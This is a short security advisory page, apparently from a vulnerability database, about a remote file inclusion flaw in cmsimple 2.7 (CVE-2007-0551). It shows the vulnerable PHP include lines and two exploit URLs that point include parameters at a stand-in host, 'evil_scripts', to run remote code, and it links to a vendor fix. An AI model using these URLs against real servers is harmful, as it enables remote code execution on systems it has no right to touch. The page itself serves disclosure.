Bug: cmsimple 2.7 Remote File Include ( Ascii Version )

Search:
WLB2

cmsimple 2.7 Remote File Include

Published
Credit
Risk
2007.01.30
Alk()mand()z
High
CWE
CVE
Local
Remote
N/A
CVE-2007-0551
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

-----------------------------------------------

cmsimple 2.7 Remote File Include

-----------------------------------------------

Author: Alk()mand()z

-----------------------------------------------

Vuln Code:

if (!@ include ($pth['file']['plugin_index']))

{if(@include($pth['file']['image']))exit;}

-----------------------------------------------

3xplo!t:

cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://evil_scripts?

cmscmsimple2_7/cmsimple/cms.php?pth['file']['image']=http://evil_scripts
?

-----------------------------------------------

download: http://www.cmsimple.dk/?download=cmsimple2_7_fix1.zip

-----------------------------------------------

Greetz: KaBaRa, SpY0zErO, aG-SpIdEr - TOoOoFa

SpeciaL GreeTz : AsB-MaY-GrOuPs & A-S-T -Team

##################################

AsB-MaY.NeT & MoHaNdKo.CoM

##################################

--
_______________________________________________
Get your free email from http://www.hackermail.com

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version